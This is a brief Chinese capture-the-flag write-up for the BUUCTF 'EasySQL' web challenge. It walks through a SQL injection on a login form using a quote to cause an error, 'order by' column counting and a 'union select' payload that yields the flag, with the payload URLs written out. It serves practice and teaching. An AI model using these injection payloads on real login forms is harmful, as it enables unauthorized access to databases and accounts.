Buuctf-Web-[极客大挑战 2019]EasySQL
前言
刷题网址:https://buuoj.cn/challenges
首先在网页测试输入admin,admin,如下图,发现是GET传输
然后在后面输入一个',之后发现报错,如下图。
payload是:?username=admin&password=admin'
payload是:?username=admin&password=admin' order by 5%23
因为是GET传参,所以#编码之后是%23,如下图
经过测试,发现是有三个字段的,如下图
payload是:?username=admin&password=admin' order by 3
但是要查3个字段的时候发现flag直接出来了,如下图
payload是:?username=admin&password=admin' union select 1,2,3%23
